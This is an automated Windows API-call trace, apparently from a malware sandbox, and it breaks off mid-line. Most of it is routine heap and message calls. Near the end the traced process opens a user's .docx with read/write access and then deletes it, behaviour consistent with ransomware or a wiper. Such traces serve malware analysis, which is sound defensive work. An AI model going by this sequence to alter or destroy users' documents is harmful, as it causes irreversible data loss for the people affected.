[0175.954] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0175.954] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0175.954] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0175.954] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0175.954] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0175.954] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc168 [0175.954] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0175.954] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0175.954] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0175.954] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0175.954] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0175.954] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc168 | out: hHeap=0x8a0000) returned 1 [0175.954] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0175.954] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0175.954] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0175.954] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0175.954] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b00 [0175.954] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0175.954] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0175.954] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0175.954] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1a30 [0175.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0175.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0175.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0175.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9fb8 [0175.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0175.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0175.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0175.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0175.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0175.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0175.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0175.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0175.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0175.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0175.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0175.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0175.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0175.955] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0175.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0175.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0175.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0175.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0175.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0175.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0175.956] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0175.956] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0175.956] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0175.956] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0175.956] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0175.956] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0175.956] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0175.956] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0175.956] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0175.956] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0175.956] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0175.956] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0175.956] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0175.956] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0175.956] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0175.956] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0175.956] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0175.956] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0175.956] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0175.956] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0175.956] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0175.956] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0175.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0175.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0175.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0175.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0175.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0175.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0175.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0175.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0175.957] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0175.957] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0175.957] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x9c2898, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0175.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0175.957] GetProcAddress (hModule=0x75c90000, lpProcName="memset") returned 0x75c99790 [0175.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0175.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0175.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0175.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0175.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0175.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0175.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0175.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0175.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0175.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0175.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0175.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0175.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0175.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0175.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0175.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0175.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0175.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0175.958] FreeLibrary (hLibModule=0x75c90000) returned 1 [0175.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0175.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0175.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0175.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0175.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0175.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0175.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0175.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0175.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0175.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0175.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0175.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0175.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0175.959] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0175.959] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0175.959] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0175.959] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0175.959] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0175.959] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0175.959] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0175.959] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0175.959] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0175.959] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0175.959] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0175.959] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0175.959] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0175.959] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0175.959] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0175.959] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0175.959] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.959] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.959] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.959] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.959] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.959] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.959] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.960] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.960] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.960] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.960] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.960] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.960] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.960] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.960] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.960] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.960] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0175.960] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0175.961] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oLilEMGSHp90H.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\olilemgshp90h.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0175.961] FreeLibrary (hLibModule=0x75990000) returned 1 [0175.961] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.961] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.961] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0175.961] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0175.961] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0175.961] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0175.961] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0175.963] FreeLibrary (hLibModule=0x75990000) returned 1 [0175.963] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0175.963] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0175.963] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0175.963] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0175.963] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0175.963] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0175.963] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0175.963] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0175.964] FreeLibrary (hLibModule=0x75990000) returned 1 [0175.964] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0175.964] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0175.964] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0175.964] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oLilEMGSHp90H.docx", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oLilEMGSHp90H.docx", lpFilePart=0x0) returned 0x3a [0175.965] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oLilEMGSHp90H.docx", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa71df400, ftCreationTime.dwHighDateTime=0x1d5e683, ftLastAccessTime.dwLowDateTime=0xba16f910, ftLastAccessTime.dwHighDateTime=0x1d59824, ftLastWriteTime.dwLowDateTime=0xe3dbd40, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x6cc4, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="oLilEMGSHp90H.docx", cAlternateFileName="OLILEM~1.DOC")) returned 0x90ae18 [0175.966] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oLilEMGSHp90H.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\olilemgshp90h.docx")) returned 1 [0175.968] FindNextFileW (in: hFindFile=0x90ae18, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa71df400, ftCreationTime.dwHighDateTime=0x1d5e683, ftLastAccessTime.dwLowDateTime=0xba16f910, ftLastAccessTime.dwHighDateTime=0x1d59824, ftLastWriteTime.dwLowDateTime=0xe3dbd40, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x6cc4, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="oLilEMGSHp90H.docx", cAlternateFileName="OLILEM~1.DOC")) returned 0 [0175.968] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0175.969] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0175.969] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0175.969] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0175.969] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0175.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0175.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0175.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0175.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="docx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0175.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".docx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0175.970] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0175.970] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0175.970] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0175.970] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0175.970] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0175.970] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0175.970] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0175.970] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0175.970] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0175.970] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0175.970] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0175.970] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0175.970] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0175.970] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0175.970] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0175.970] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 